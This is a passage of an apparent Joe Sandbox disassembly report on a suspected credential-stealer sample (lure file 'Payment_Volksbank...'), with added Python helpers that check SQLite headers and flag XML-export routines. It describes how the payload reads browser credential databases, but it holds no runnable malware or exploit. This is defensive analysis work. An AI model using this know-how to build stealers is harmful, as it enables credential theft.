• memcmp.MSVCRT(?,?,00000004,00000000,?,?,0041DE5E,?,?,?,?,00436073), ref: 0041DBAE
• memcmp.MSVCRT(?,SQLite format 3,00000010,00000000,?,?,0041DE5E,?,?,?), ref: 0041DBDB
• memcmp.MSVCRT(?,@ ,00000003,?,?,?,00000000,?,?,0041DE5E,?,?,?), ref: 0041DC47
Strings
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: memcmp$memcpy
• String ID: @ $SQLite format 3
• API String ID: 231171946-3708268960
• Opcode ID: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
• Instruction ID: bab8e9e22e0f3e3322208b515ecc9156aa125374c4e71f07eecd891e4e8170cf
• Opcode Fuzzy Hash: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
• Instruction Fuzzy Hash: 1851BFB1E002099BDB20DF69C981BEAB7F4AF54304F10056FE44597742E7B8EA85CB98
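The three memcmp calls in the function above (a 4-byte compare at 0041DBAE, a 16-byte compare against "SQLite format 3" at 0041DBDB, and a 3-byte compare against "@  " at 0041DC47) are, in that order, the page-1 header checks that SQLite's own lockBtree() performs when it opens a database: change-counter vs. version-valid-for, the magic string, and the fixed payload-fraction bytes 64/32/32 at offset 21. Together with the other SQLite source strings in this dump ("no query solution", "winWrite1"/"winWrite2", the foreign-key error messages), this indicates a statically linked SQLite engine inside the unpacked payload, which is what a stealer needs to read browser credential and history databases. The mapping of the three compares onto lockBtree() is an inference from the argument sizes and string constants, not something the report states. The following is an added example, not code from the sample or from Joe Sandbox; it re-implements those header checks in Python so an analyst can recognise the same logic elsewhere and verify what a suspected "SQLite format 3" blob actually is. The helper names and the constructed header bytes are the example's own.

```python
"""Page-1 header validation equivalent to the three memcmp calls above.

Added example (not code from the sample or the sandbox).  The checks follow
SQLite's documented file-format header; the sample header built by
build_header() is constructed here for the demonstration.
"""
import struct
import sys

SQLITE_MAGIC = b"SQLite format 3\x00"   # 16 bytes at offset 0   (memcmp len 0x10)
PAYLOAD_FRACTIONS = b"\x40\x20\x20"     # "@  " at offset 21     (memcmp len 3)


def check_sqlite_page1(page1: bytes) -> dict:
    """Validate the first 100 bytes of a file the way lockBtree() does.

    Returns a dict: is_sqlite, reason, page_size, page_count.
    page_count is None when the in-header count cannot be trusted (the
    4-byte compare of offsets 24 and 92 fails), in which case SQLite falls
    back to deriving it from the file size.
    """
    result = {"is_sqlite": False, "reason": None, "page_size": None, "page_count": None}
    if len(page1) < 100:
        result["reason"] = "header shorter than 100 bytes"
        return result
    # 16-byte compare at offset 0: the magic string (memcmp at 0041DBDB).
    if page1[:16] != SQLITE_MAGIC:
        result["reason"] = "magic mismatch"
        return result
    # 3-byte compare at offset 21: max/min embedded payload fraction and
    # leaf payload fraction must be 64, 32, 32 (memcmp at 0041DC47).
    if page1[21:24] != PAYLOAD_FRACTIONS:
        result["reason"] = "payload fractions not 64/32/32"
        return result
    # Page size: big-endian u16 at offset 16; the value 1 encodes 65536.
    page_size = struct.unpack(">H", page1[16:18])[0]
    if page_size == 1:
        page_size = 65536
    if not (512 <= page_size <= 65536 and page_size & (page_size - 1) == 0):
        result["reason"] = "invalid page size %d" % page_size
        return result
    result["page_size"] = page_size
    # 4-byte compare: file change counter (offset 24) against
    # version-valid-for (offset 92) (memcmp at 0041DBAE).  Only when they
    # agree is the in-header page count at offset 28 trusted.
    counters_match = page1[24:28] == page1[92:96]
    header_pages = struct.unpack(">I", page1[28:32])[0]
    result["page_count"] = header_pages if (counters_match and header_pages) else None
    result["is_sqlite"] = True
    return result


def build_header(page_size: int, page_count: int, change_counter: int,
                 version_valid_for: int) -> bytes:
    """Construct a minimal 100-byte SQLite header for testing (constructed data)."""
    h = bytearray(100)
    h[0:16] = SQLITE_MAGIC
    h[16:18] = struct.pack(">H", 1 if page_size == 65536 else page_size)
    h[18] = 1          # file format write version (legacy)
    h[19] = 1          # file format read version (legacy)
    h[21:24] = PAYLOAD_FRACTIONS
    h[24:28] = struct.pack(">I", change_counter)
    h[28:32] = struct.pack(">I", page_count)
    h[92:96] = struct.pack(">I", version_valid_for)
    h[96:100] = struct.pack(">I", 3046000)   # SQLITE_VERSION_NUMBER, arbitrary here
    return bytes(h)


if __name__ == "__main__":
    # Usage: python sqlite_header.py <file> ...  (e.g. a recovered "Login Data")
    for path in sys.argv[1:]:
        with open(path, "rb") as f:
            print(path, check_sqlite_page1(f.read(100)))
```

A hit on all three compares is a strong indicator that a buffer is a real SQLite database rather than a lure, and the same three constants ("SQLite format 3", "@  ", and a 4-byte compare of offsets 24 and 92) are a reliable way to spot a statically linked SQLite engine in other unpacked stealer payloads.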
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: memcpy$memset
• String ID: winWrite1$winWrite2
• API String ID: 438689982-3457389245
• Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
• Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
• Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
• Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpymemset
                                                                                                                                                                                                                                          • String ID: winRead
                                                                                                                                                                                                                                          • API String ID: 1297977491-2759563040
                                                                                                                                                                                                                                          • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                                                                                                                                                          • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0044955B
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0044956B
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpymemset
                                                                                                                                                                                                                                          • String ID: gj
                                                                                                                                                                                                                                          • API String ID: 1297977491-4203073231
                                                                                                                                                                                                                                          • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                                                                                                                                                          • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                                                                            • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,76940A60,00000000,?,?,0040A7BE,00000001,0044CBC0,76940A60), ref: 00406D4D
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040AB9C
                                                                                                                                                                                                                                            • Part of subcall function 00411004: memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                                                                                                                                                                            • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                                                                                                                                                                                            • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040ABE1
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
                                                                                                                                                                                                                                          • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                                                                                          • API String ID: 3337535707-2769808009
                                                                                                                                                                                                                                          • Opcode ID: 94fb3ee970197c35f89b73c5c9c871d1a7be37581e6fd1bc9edd3009dd58cb65
                                                                                                                                                                                                                                          • Instruction ID: d3fada9700ccfca67da5e06a008153287a477451e6e6bd371d19fa9d49944530
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 94fb3ee970197c35f89b73c5c9c871d1a7be37581e6fd1bc9edd3009dd58cb65
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50110631A00216BFEB11AF18CD42F99BB64FF0831CF10402AF509665A1DB79B970CB98
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetParent.USER32(?), ref: 004090C2
                                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4247780290-0
                                                                                                                                                                                                                                          • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                                                                                                                                                          • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B9B1
                                                                                                                                                                                                                                            • Part of subcall function 00406C62: LoadCursorA.USER32(00000000,00007F02), ref: 00406C69
                                                                                                                                                                                                                                            • Part of subcall function 00406C62: SetCursor.USER32(00000000), ref: 00406C70
                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B9D4
                                                                                                                                                                                                                                            • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B929
                                                                                                                                                                                                                                            • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B953
                                                                                                                                                                                                                                            • Part of subcall function 0040B903: _mbscat.MSVCRT ref: 0040B966
                                                                                                                                                                                                                                            • Part of subcall function 0040B903: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                                                                                                                                                                          • SetCursor.USER32(?,?,0040CBD2), ref: 0040B9F9
                                                                                                                                                                                                                                          • SetFocus.USER32(?,?,?,0040CBD2), ref: 0040BA0B
                                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040BA22
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessageSend$Cursor$sprintf$FocusLoad_mbscat
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2374668499-0
                                                                                                                                                                                                                                          • Opcode ID: c223344c3a39cb50a824543c0933464b2b2e3202265bd74e385ec46d38a17b1f
                                                                                                                                                                                                                                          • Instruction ID: f32a2dbc35f7bf6d698eec3472f2a5e56a7287d41e7566127b95ec9cf4f32314
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c223344c3a39cb50a824543c0933464b2b2e3202265bd74e385ec46d38a17b1f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 450129B5204604EFD326AB75DC85FA6B7E8FF48305F0504B9F2499B271CA716D018B14
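The function records in this section follow one fixed layout (an APIs block with direct and "Part of subcall function" references, an optional Strings block with xrefs, and a Similarity block whose "String ID" joins the function's strings with "$"). Below is an added example, not part of the Joe Sandbox report or its IDA plugin, that parses that layout and flags the records whose profile is an XML file-export routine: XML markup strings (the `<?xml ...?>`, `<item>` and `<%s>%s</%s>` literals seen in the records above) next to a WriteFile reach, direct or through a subcall. The sample records are copied from this section with the indentation and link labels stripped. Reading such a routine as the sandboxed payload writing harvested items to a file on disk is an assumption of the example, not a statement the report makes.

```python
"""Parser for Joe Sandbox IDA-plugin function records plus an XML-export profile
check. Added example; not report or plugin code."""
import re
from dataclasses import dataclass, field
from typing import Optional

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source",
                   "Joe Sandbox IDA Plugin", "Similarity"}

# "memcpy.MSVCRT(?,<,00000004,?), ref: 00411072"   "sprintf.MSVCRT ref: 0040ABE1"
# "Part of subcall function 00406D33: WriteFile.KERNEL32(...), ref: 00406D4D"
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]{8})$")
# '<?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040AD76'
STR_RE = re.compile(r"^(?P<s>.*), xrefs: (?P<ref>[0-9A-F]{8})$")


@dataclass
class ApiRef:
    api: str
    module: str
    ref: str
    args: Optional[str]
    via_subcall: Optional[str]  # address of the callee when the reference is indirect


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)      # (string, xref address)
    similarity: dict = field(default_factory=dict)   # "API ID", "String ID", hashes...

    def all_strings(self):
        """Strings bullets plus the '$'-joined Similarity 'String ID' parts."""
        ids = self.similarity.get("String ID", "")
        return {s for s, _ in self.strings} | {p for p in ids.split("$") if p}

    def api_names(self, include_subcalls=True):
        return {a.api for a in self.apis if include_subcalls or a.via_subcall is None}


def parse_records(text):
    """Split the plugin output into records; each record starts at an 'APIs' header."""
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTION_HEADERS:
            if line == "APIs":
                current = FunctionRecord()
                records.append(current)
            section = line
            continue
        if current is None or not line.startswith("•"):
            continue
        body = line[1:].strip()
        if section == "APIs":
            m = API_RE.match(body)
            if m:
                current.apis.append(ApiRef(m["api"], m["mod"], m["ref"], m["args"], m["sub"]))
        elif section == "Strings":
            m = STR_RE.match(body)
            if m:
                current.strings.append((m["s"], m["ref"]))
        elif section == "Similarity":
            key, _, value = body.partition(":")
            current.similarity[key.strip()] = value.strip()
    return records


XML_EXPORT_MARKERS = ("<?xml", "<item>", "</item>", "<%s>%s</%s>")


def looks_like_xml_export(rec):
    """XML markup in the function's strings and a WriteFile reach (direct or via subcall)."""
    has_markup = any(mk in s for s in rec.all_strings() for mk in XML_EXPORT_MARKERS)
    return has_markup and "WriteFile" in rec.api_names()


# Records copied from the report section (constructed sample input for this example).
SAMPLE = """\
APIs
  • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
  • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,76940A60,00000000,?,?,0040A7BE,00000001,0044CBC0,76940A60), ref: 00406D4D
• memset.MSVCRT ref: 0040AB9C
  • Part of subcall function 00411004: memcpy.MSVCRT(?,<,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
• sprintf.MSVCRT ref: 0040ABE1
Strings
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
• String ID: <%s>%s</%s>$</item>$<item>
• Instruction Fuzzy Hash: 50110631A00216BFEB11AF18CD42F99BB64FF0831CF10402AF509665A1DB79B970CB98
APIs
• GetParent.USER32(?), ref: 004090C2
• GetWindowRect.USER32(?,?), ref: 004090CF
• SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
Similarity
• API ID: Window$Rect$ClientParentPoints
• String ID:
APIs
• memset.MSVCRT ref: 0040AD5B
  • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,76940A60,00000000,?,?,0040A7BE,00000001,0044CBC0,76940A60), ref: 00406D4D
• sprintf.MSVCRT ref: 0040ADA8
Strings
• <%s>, xrefs: 0040ADA2
• <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040AD76
"""

if __name__ == "__main__":
    for i, rec in enumerate(parse_records(SAMPLE)):
        print(i, sorted(rec.api_names()), looks_like_xml_export(rec))
```

The subcall flag matters for the check: in the first sample record WriteFile is only reachable through function 00406D33, so a match on direct API references alone (`api_names(include_subcalls=False)`) would miss it.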
APIs
• memset.MSVCRT ref: 0040AD5B
• memset.MSVCRT ref: 0040AD71
  • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
  • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,76940A60,00000000,?,?,0040A7BE,00000001,0044CBC0,76940A60), ref: 00406D4D
  • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
  • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
• sprintf.MSVCRT ref: 0040ADA8
Strings
• <%s>, xrefs: 0040ADA2
• <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040AD76
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
• String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
• API String ID: 3699762281-1998499579
• Opcode ID: f08f26e7c6bf1a33ee1b85fc51aa9ff2daee10922a246ae1c01303c1338e46c2
• Instruction ID: d8254de8a9900f2911fb5d1c0b13fc0cc865a5027b69882d7a9a790f368f6919
• Opcode Fuzzy Hash: f08f26e7c6bf1a33ee1b85fc51aa9ff2daee10922a246ae1c01303c1338e46c2
• Instruction Fuzzy Hash: 49012B7294012877E721A719CC46FDABB6C9F54304F0500F7B50DF3082DBB8AB508BA4
APIs
• ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76940A60,?,00000000), ref: 00409A3E
• ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76940A60,?,00000000), ref: 00409A4C
• ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76940A60,?,00000000), ref: 00409A5D
• ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76940A60,?,00000000), ref: 00409A74
• ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76940A60,?,00000000), ref: 00409A7D
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0
• Opcode ID: b88760ef2a9cfab350ce0474c381e2ce36942e7c393404a0687f9da8e94e787a
• Instruction ID: b8efe39ffa321d4f2ce8ce974eba3160cbf96dc633dc1e2aadb4e529a4dc2577
• Opcode Fuzzy Hash: b88760ef2a9cfab350ce0474c381e2ce36942e7c393404a0687f9da8e94e787a
• Instruction Fuzzy Hash: A9F0F4726057855BD7209F6999C1A57F7D9BB98714791083FF189F3A81CB38FC404A18
APIs
  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76940A60,?,00000000), ref: 00409A3E
  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76940A60,?,00000000), ref: 00409A4C
  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76940A60,?,00000000), ref: 00409A5D
  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76940A60,?,00000000), ref: 00409A74
  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76940A60,?,00000000), ref: 00409A7D
• ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AB3
• ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AC6
• ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AD9
• ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AEC
• free.MSVCRT ref: 00409B00
  • Part of subcall function 00407A55: free.MSVCRT ref: 00407A5C
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: ??3@$free
• String ID:
• API String ID: 2241099983-0
• Opcode ID: 2269fc206d2d283b797854ae73677064badd7dde056db72ab5a07573cc1b8c0d
• Instruction ID: 0e1833da384361268bbd99a4020487bffb4c29eeff2b5ca4c2d3cb4a232d8152
• Opcode Fuzzy Hash: 2269fc206d2d283b797854ae73677064badd7dde056db72ab5a07573cc1b8c0d
• Instruction Fuzzy Hash: 3FF0A932F068B05BC2117B669002B0EB398AD81B2831A016FF8147B6D2CB3CBC504ADE
APIs
  • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
  • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
  • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
• SetBkMode.GDI32(?,00000001), ref: 0041079E
• GetSysColor.USER32(00000005), ref: 004107A6
• SetBkColor.GDI32(?,00000000), ref: 004107B0
• SetTextColor.GDI32(?,00C00000), ref: 004107BE
• GetSysColorBrush.USER32(00000005), ref: 004107C6
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: Color$BrushClassModeNameText_strcmpimemset
• String ID:
• API String ID: 2775283111-0
• Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
• Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
• Opcode Fuzzy Hash: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
• Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • BeginDeferWindowPos.USER32(0000000A), ref: 00405F6C
                                                                                                                                                                                                                                            • Part of subcall function 004015F4: GetDlgItem.USER32(?,?), ref: 00401604
                                                                                                                                                                                                                                            • Part of subcall function 004015F4: GetClientRect.USER32(?,?), ref: 00401616
                                                                                                                                                                                                                                            • Part of subcall function 004015F4: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00401680
                                                                                                                                                                                                                                          • EndDeferWindowPos.USER32(?), ref: 0040602B
                                                                                                                                                                                                                                          • InvalidateRect.USER32(?,?,00000001), ref: 00406036
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: DeferWindow$Rect$BeginClientInvalidateItem
• String ID: $
• API String ID: 2498372239-3993045852
APIs
